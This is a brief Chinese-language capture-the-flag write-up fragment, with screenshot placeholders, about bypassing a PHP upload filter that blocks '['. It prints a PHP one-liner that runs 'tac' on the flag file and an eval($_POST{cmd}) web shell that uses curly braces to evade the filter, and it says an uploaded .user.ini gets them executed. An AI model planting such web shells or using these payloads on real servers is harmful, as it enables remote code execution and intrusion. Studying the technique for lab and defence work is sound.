1. 在前面基础上还过滤了[
      image-20210720140359982.png
    2. 但是可以利用直接代码执行,或者用{}进行绕过
      ```shell <?= system(‘tac ../fla*’);?>

    <?= eval($_POST{cmd});?> ``` image-20210720141008582.png

    1. 配合上传.user.ini进行解析,利用工具rec
      image-20210720141124629.png